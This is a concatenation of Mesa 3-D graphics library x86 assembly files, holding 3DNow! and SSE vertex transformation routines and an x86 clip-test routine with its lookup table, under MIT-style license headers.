PUNPCKLDQ ( MM4, MM4 ) /* x0 | x0 */
PFMUL ( MM0, MM4 ) /* x0*m01 | x0*m00 */
PFADD ( MM2, MM4 ) /* x0*m01+m31 | x0*m00+m30 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2R_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2R_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_2d_no_rot )
HIDDEN(_mesa_3dnow_transform_points1_2d_no_rot)
GLNAME( _mesa_3dnow_transform_points1_2d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(2), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2NRR_3 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2NRR_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
PFMUL ( MM0, MM4 ) /* | x0*m00 */
PFADD ( MM2, MM4 ) /* m31 | x0*m00+m30 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2NRR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2NRR_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_3d )
HIDDEN(_mesa_3dnow_transform_points1_3d)
GLNAME( _mesa_3dnow_transform_points1_3d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3R_3 ) )
MOVQ ( REGIND(ECX), MM0 ) /* m01 | m00 */
MOVD ( REGOFF(8, ECX), MM1 ) /* | m02 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TP3R_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
PUNPCKLDQ ( MM4, MM4 ) /* x0 | x0 */
MOVQ ( MM4, MM5 ) /* | x0 */
PFMUL ( MM0, MM4 ) /* x0*m01 | x0*m00 */
PFMUL ( MM1, MM5 ) /* | x0*m02 */
PFADD ( MM2, MM4 ) /* x0*m01+m31 | x0*m00+m30 */
PFADD ( MM3, MM5 ) /* | x0*m02+m32 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVD ( MM5, REGOFF(8, EDX) ) /* write r2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3R_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3R_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 14,295
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/sse_xform2.S
|
/* $Id: sse_xform2.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/** TODO:
* - insert PREFETCH instructions to avoid cache-misses !
* - some more optimizations are possible...
* - for 40-50% more performance in the SSE-functions, the
* data (trans-matrix, src_vert, dst_vert) needs to be 16byte aligned !
*/
#ifdef USE_SSE_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define S(i) REGOFF(i * 4, ESI)
#define D(i) REGOFF(i * 4, EDI)
#define M(i) REGOFF(i * 4, EDX)
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_general)
HIDDEN (_mesa_sse_transform_points2_general)
GLNAME( _mesa_sse_transform_points2_general ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX )
JZ( LLBL(K_GTP2GR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVAPS( M(0), XMM0 ) /* m3 | m2 | m1 | m0 */
MOVAPS( M(4), XMM1 ) /* m7 | m6 | m5 | m4 */
MOVAPS( M(12), XMM2 ) /* m15 | m14 | m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP2GR_top):
MOVSS( S(0), XMM3 ) /* ox */
SHUFPS( CONST(0x0), XMM3, XMM3 ) /* ox | ox | ox | ox */
MULPS( XMM0, XMM3 ) /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
MOVSS( S(1), XMM4 ) /* oy */
SHUFPS( CONST(0x0), XMM4, XMM4 ) /* oy | oy | oy | oy */
MULPS( XMM1, XMM4 ) /* oy*m7 | oy*m6 | oy*m5 | oy*m4 */
ADDPS( XMM4, XMM3 )
ADDPS( XMM2, XMM3 )
MOVAPS( XMM3, D(0) )
LLBL(K_GTP2GR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP2GR_top) )
LLBL(K_GTP2GR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_identity)
HIDDEN(_mesa_sse_transform_points2_identity)
GLNAME( _mesa_sse_transform_points2_identity ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP2IR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
CMP_L( ESI, EDI )
JE( LLBL(K_GTP2IR_finish) )
ALIGNTEXT32
LLBL(K_GTP2IR_top):
MOV_L ( S(0), EDX )
MOV_L ( EDX, D(0) )
MOV_L ( S(1), EDX )
MOV_L ( EDX, D(1) )
LLBL(K_GTP2IR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP2IR_top) )
LLBL(K_GTP2IR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_3d_no_rot)
HIDDEN(_mesa_sse_transform_points2_3d_no_rot)
GLNAME(_mesa_sse_transform_points2_3d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP23DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM1 ) /* - | - | - | m0 */
MOVSS ( M(5), XMM2 ) /* - | - | - | m5 */
UNPCKLPS ( XMM2, XMM1 ) /* - | - | m5 | m0 */
MOVLPS ( M(12), XMM2 ) /* - | - | m13 | m12 */
MOVSS ( M(14), XMM3 ) /* - | - | - | m14 */
ALIGNTEXT32
LLBL(K_GTP23DNRR_top):
MOVLPS ( S(0), XMM0 ) /* - | - | oy | ox */
MULPS ( XMM1, XMM0 ) /* - | - | oy*m5 | ox*m0 */
ADDPS ( XMM2, XMM0 ) /* - | - | +m13 | +m12 */
MOVLPS ( XMM0, D(0) ) /* -> D(1) | -> D(0) */
MOVSS ( XMM3, D(2) ) /* -> D(2) */
LLBL(K_GTP23DNRR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP23DNRR_top) )
LLBL(K_GTP23DNRR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_perspective)
HIDDEN(_mesa_sse_transform_points2_perspective)
GLNAME(_mesa_sse_transform_points2_perspective):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP23PR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM1 ) /* - | - | - | m0 */
MOVSS ( M(5), XMM2 ) /* - | - | - | m5 */
UNPCKLPS ( XMM2, XMM1 ) /* - | - | m5 | m0 */
MOVSS ( M(14), XMM3 ) /* m14 */
XORPS ( XMM0, XMM0 ) /* 0 | 0 | 0 | 0 */
ALIGNTEXT32
LLBL(K_GTP23PR_top):
MOVLPS( S(0), XMM4 ) /* oy | ox */
MULPS( XMM1, XMM4 ) /* oy*m5 | ox*m0 */
MOVLPS( XMM4, D(0) ) /* ->D(1) | ->D(0) */
MOVSS( XMM3, D(2) ) /* ->D(2) */
MOVSS( XMM0, D(3) ) /* ->D(3) */
LLBL(K_GTP23PR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP23PR_top) )
LLBL(K_GTP23PR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_2d)
HIDDEN(_mesa_sse_transform_points2_2d)
GLNAME(_mesa_sse_transform_points2_2d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP23P2DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVLPS( M(0), XMM0 ) /* m1 | m0 */
MOVLPS( M(4), XMM1 ) /* m5 | m4 */
MOVLPS( M(12), XMM2 ) /* m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP23P2DR_top):
MOVSS( S(0), XMM3 ) /* ox */
SHUFPS( CONST(0x0), XMM3, XMM3 ) /* ox | ox */
MULPS( XMM0, XMM3 ) /* ox*m1 | ox*m0 */
MOVSS( S(1), XMM4 ) /* oy */
SHUFPS( CONST(0x0), XMM4, XMM4 ) /* oy | oy */
MULPS( XMM1, XMM4 ) /* oy*m5 | oy*m4 */
ADDPS( XMM4, XMM3 )
ADDPS( XMM2, XMM3 )
MOVLPS( XMM3, D(0) ) /* ->D(1) | ->D(0) */
LLBL(K_GTP23P2DR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP23P2DR_top) )
LLBL(K_GTP23P2DR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_2d_no_rot)
HIDDEN(_mesa_sse_transform_points2_2d_no_rot)
GLNAME(_mesa_sse_transform_points2_2d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP23P2DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM1 ) /* m0 */
MOVSS ( M(5), XMM2 ) /* m5 */
UNPCKLPS ( XMM2, XMM1 ) /* m5 | m0 */
MOVLPS ( M(12), XMM2 ) /* m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP23P2DNRR_top):
MOVLPS( S(0), XMM0 ) /* oy | ox */
MULPS( XMM1, XMM0 ) /* oy*m5 | ox*m0 */
ADDPS( XMM2, XMM0 ) /* +m13 | +m12 */
MOVLPS( XMM0, D(0) ) /* ->D(1) | ->D(0) */
LLBL(K_GTP23P2DNRR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP23P2DNRR_top) )
LLBL(K_GTP23P2DNRR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points2_3d)
HIDDEN(_mesa_sse_transform_points2_3d)
GLNAME(_mesa_sse_transform_points2_3d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP23P3DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVAPS( M(0), XMM0 ) /* m2 | m1 | m0 */
MOVAPS( M(4), XMM1 ) /* m6 | m5 | m4 */
MOVAPS( M(12), XMM2 ) /* m14 | m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP23P3DR_top):
MOVSS( S(0), XMM3 ) /* ox */
SHUFPS( CONST(0x0), XMM3, XMM3 ) /* ox | ox | ox */
MULPS( XMM0, XMM3 ) /* ox*m2 | ox*m1 | ox*m0 */
MOVSS( S(1), XMM4 ) /* oy */
SHUFPS( CONST(0x0), XMM4, XMM4 ) /* oy | oy | oy */
MULPS( XMM1, XMM4 ) /* oy*m6 | oy*m5 | oy*m4 */
ADDPS( XMM4, XMM3 )
ADDPS( XMM2, XMM3 )
MOVLPS( XMM3, D(0) ) /* ->D(1) | ->D(0) */
UNPCKHPS( XMM3, XMM3 )
MOVSS( XMM3, D(2) ) /* ->D(2) */
LLBL(K_GTP23P3DR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP23P3DR_top) )
LLBL(K_GTP23P3DR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 8,959
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/x86_cliptest.S
|
/* $Id: x86_cliptest.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* NOTE: Avoid using spaces in between '(' ')' and arguments, especially
* with macros like CONST, LLBL that expand to CONCAT(...). Putting spaces
* in there will break the build on some platforms.
*/
#include "matypes.h"
#include "clip_args.h"
#define SRC0 REGOFF(0, ESI)
#define SRC1 REGOFF(4, ESI)
#define SRC2 REGOFF(8, ESI)
#define SRC3 REGOFF(12, ESI)
#define DST0 REGOFF(0, EDI)
#define DST1 REGOFF(4, EDI)
#define DST2 REGOFF(8, EDI)
#define DST3 REGOFF(12, EDI)
#define MAT0 REGOFF(0, EDX)
#define MAT1 REGOFF(4, EDX)
#define MAT2 REGOFF(8, EDX)
#define MAT3 REGOFF(12, EDX)
/*
* Table for clip test.
*
* bit6 = SRC3 < 0
* bit5 = SRC2 < 0
* bit4 = abs(S(2)) > abs(S(3))
* bit3 = SRC1 < 0
* bit2 = abs(S(1)) > abs(S(3))
* bit1 = SRC0 < 0
* bit0 = abs(S(0)) > abs(S(3))
*/
SEG_DATA
clip_table:
D_BYTE 0x00, 0x01, 0x00, 0x02, 0x04, 0x05, 0x04, 0x06
D_BYTE 0x00, 0x01, 0x00, 0x02, 0x08, 0x09, 0x08, 0x0a
D_BYTE 0x20, 0x21, 0x20, 0x22, 0x24, 0x25, 0x24, 0x26
D_BYTE 0x20, 0x21, 0x20, 0x22, 0x28, 0x29, 0x28, 0x2a
D_BYTE 0x00, 0x01, 0x00, 0x02, 0x04, 0x05, 0x04, 0x06
D_BYTE 0x00, 0x01, 0x00, 0x02, 0x08, 0x09, 0x08, 0x0a
D_BYTE 0x10, 0x11, 0x10, 0x12, 0x14, 0x15, 0x14, 0x16
D_BYTE 0x10, 0x11, 0x10, 0x12, 0x18, 0x19, 0x18, 0x1a
D_BYTE 0x3f, 0x3d, 0x3f, 0x3e, 0x37, 0x35, 0x37, 0x36
D_BYTE 0x3f, 0x3d, 0x3f, 0x3e, 0x3b, 0x39, 0x3b, 0x3a
D_BYTE 0x2f, 0x2d, 0x2f, 0x2e, 0x27, 0x25, 0x27, 0x26
D_BYTE 0x2f, 0x2d, 0x2f, 0x2e, 0x2b, 0x29, 0x2b, 0x2a
D_BYTE 0x3f, 0x3d, 0x3f, 0x3e, 0x37, 0x35, 0x37, 0x36
D_BYTE 0x3f, 0x3d, 0x3f, 0x3e, 0x3b, 0x39, 0x3b, 0x3a
D_BYTE 0x1f, 0x1d, 0x1f, 0x1e, 0x17, 0x15, 0x17, 0x16
D_BYTE 0x1f, 0x1d, 0x1f, 0x1e, 0x1b, 0x19, 0x1b, 0x1a
SEG_TEXT
/*
* _mesa_x86_cliptest_points4
*
* AL: ormask
* AH: andmask
* EBX: temp0
* ECX: temp1
* EDX: clipmask[]
* ESI: clip[]
* EDI: proj[]
* EBP: temp2
*/
#if defined(__ELF__) && defined(__PIC__) && defined(GNU_ASSEMBLER) && !defined(ELFPIC)
#define ELFPIC
#endif
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_cliptest_points4 )
HIDDEN(_mesa_x86_cliptest_points4)
GLNAME( _mesa_x86_cliptest_points4 ):
#ifdef ELFPIC
#define FRAME_OFFSET 20
#else
#define FRAME_OFFSET 16
#endif
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBP )
PUSH_L( EBX )
#ifdef ELFPIC
/* store pointer to clip_table on stack */
CALL( LLBL(ctp4_get_eip) )
ADD_L( CONST(_GLOBAL_OFFSET_TABLE_), EBX )
MOV_L( REGOFF(clip_table@GOT, EBX), EBX )
PUSH_L( EBX )
JMP( LLBL(ctp4_clip_table_ready) )
LLBL(ctp4_get_eip):
/* store eip in ebx */
MOV_L( REGIND(ESP), EBX )
RET
LLBL(ctp4_clip_table_ready):
#endif
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_CLIP, EDX )
MOV_L( ARG_OR, EBX )
MOV_L( ARG_AND, EBP )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( EAX, ARG_SOURCE ) /* put stride in ARG_SOURCE */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDX, ECX )
MOV_L( ECX, ARG_CLIP ) /* put clipmask + count in ARG_CLIP */
CMP_L( ECX, EDX )
MOV_B( REGIND(EBX), AL )
MOV_B( REGIND(EBP), AH )
JZ( LLBL(ctp4_finish) )
ALIGNTEXT16
LLBL(ctp4_top):
FLD1 /* F3 */
FDIV_S( SRC3 ) /* GH: don't care about div-by-zero */
MOV_L( SRC3, EBP )
MOV_L( SRC2, EBX )
XOR_L( ECX, ECX )
ADD_L( EBP, EBP ) /* ebp = abs(S(3))*2 ; carry = sign of S(3) */
ADC_L( ECX, ECX )
ADD_L( EBX, EBX ) /* ebx = abs(S(2))*2 ; carry = sign of S(2) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(2))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
MOV_L( SRC1, EBX )
ADD_L( EBX, EBX ) /* ebx = abs(S(1))*2 ; carry = sign of S(1) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(1))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
MOV_L( SRC0, EBX )
ADD_L( EBX, EBX ) /* ebx = abs(S(0))*2 ; carry = sign of S(0) */
ADC_L( ECX, ECX )
CMP_L( EBX, EBP ) /* carry = abs(S(0))*2 > abs(S(3))*2 */
ADC_L( ECX, ECX )
#ifdef ELFPIC
MOV_L( REGIND(ESP), EBP ) /* clip_table */
MOV_B( REGBI(EBP, ECX), CL )
#else
MOV_B( REGOFF(clip_table,ECX), CL )
#endif
OR_B( CL, AL )
